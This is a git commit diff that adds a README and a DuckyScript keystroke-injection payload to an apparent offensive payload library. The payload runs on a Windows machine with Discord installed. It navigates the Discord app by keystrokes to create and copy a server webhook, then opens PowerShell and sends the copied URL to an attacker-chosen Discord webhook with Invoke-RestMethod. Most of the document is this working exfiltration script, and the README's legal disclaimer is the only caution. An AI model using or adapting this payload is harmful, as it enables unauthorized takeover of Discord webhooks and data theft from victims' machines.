Merge pull request #341 from aleff-github/patch-60

Create And Exfiltrate A Webhook Of Discord
2024-01-08 02:21:56 -05:00 · 2024-01-08 02:21:56 -05:00 · d75f9f96cc
parent aa7262756d d893fb51a2
commit d75f9f96cc
2 changed files with 198 additions and 0 deletions
--- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md
+++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md
@ -0,0 +1,56 @@
+# Create And Exfiltrate A Webhook Of Discord
+
+This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
+
+**Category**: Exfiltration
+
+## Description
+
+This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
+
+First of all open Discord trough Windows GUI, the open time may vary depending on the pc and whether there may be updates that need to be done. When it is open, search the server using a Discord keyboard shortcut *\<server_name>, then go to first channel and open the settings using TABx11, then go to Integration settings using TABx6 and DOWN_ARROWx3, then create a Webhook (Because it may happen that there is still not even one) and copy the first reachable, then close Discord.
+
+To do the exfiltration I decided to use another discord webhook but of course you can use whatever exfiltration method you prefer.
+
+**Stealing a Discord webhook without authorization is considered a cybercrime**. Acquiring a webhook without proper permission is a violation of digital security and can be subject to legal consequences.
+
+## Dependencies
+
+* Discord Installed
+* Internet connection
+
+## Settings
+
+- You must define the Discord server name i.e. Hak5
+
+    `DEFINE #SERVER_NAME example`
+
+- You must define your Dropbox accessToken or modify the exfiltration modality.
+
+    `DEFINE #DISCORD_WEBHOOK example`
+
+- The open time may vary depending on the pc and whether there may be updates that need to be done
+    
+    `DELAY 6000`
+    
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>
--- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
+++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
@ -0,0 +1,142 @@
+REM ###############################################################
+REM #                                                             |
+REM # Title        : Create And Exfiltrate A Webhook Of Discord   |
+REM # Author       : Aleff                                        |
+REM # Version      : 1.0                                          |
+REM # Category     : Exfiltration                                 |
+REM # Target       : Windows 10-11                                |
+REM #                                                             |
+REM ###############################################################
+
+
+REM Requirements:
+REM     - Internet connection
+REM     - Discord Installed
+
+
+REM You must define the Discord server name i.e. Hak5
+DEFINE #SERVER_NAME example
+
+REM You must define your Discord webhook if you want to use this method for the exfiltration
+DEFINE #DISCORD_WEBHOOK example
+
+REM Open Discord app
+GUI
+DELAY 1000
+STRING Discord
+ENTER
+
+REM It depends
+DELAY 6000
+
+REM Search by Discord keyboard shortcut and open it
+CTRL k
+DELAY 500
+STRINGLN *#SERVER_NAME
+DELAY 500
+
+REM Go to first channel and open the settings
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+ENTER
+DELAY 500
+
+REM Open Integrations section
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+DOWN_ARROW
+DELAY 500
+DOWN_ARROW
+DELAY 500
+DOWN_ARROW
+DELAY 500
+ENTER
+DELAY 500
+
+REM Webhooks settings
+TAB
+DELAY 500
+TAB
+DELAY 500
+ENTER
+
+REM Create Webhook
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+ENTER
+DELAY 500
+
+REM Select first Webhook
+TAB
+DELAY 500
+ENTER
+DELAY 500
+
+REM Copy Webhook
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+SPACE
+DELAY 500
+
+REM Close Discord
+ALT F4
+
+REM Open a PowerShell
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 2000
+
+REM Exfiltration using Discord Webhook
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
+
+STRING $Payload = @{content = "
+CTRL v
+STRINGLN "} | ConvertTo-Json
+
+STRINGLN Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'; exit;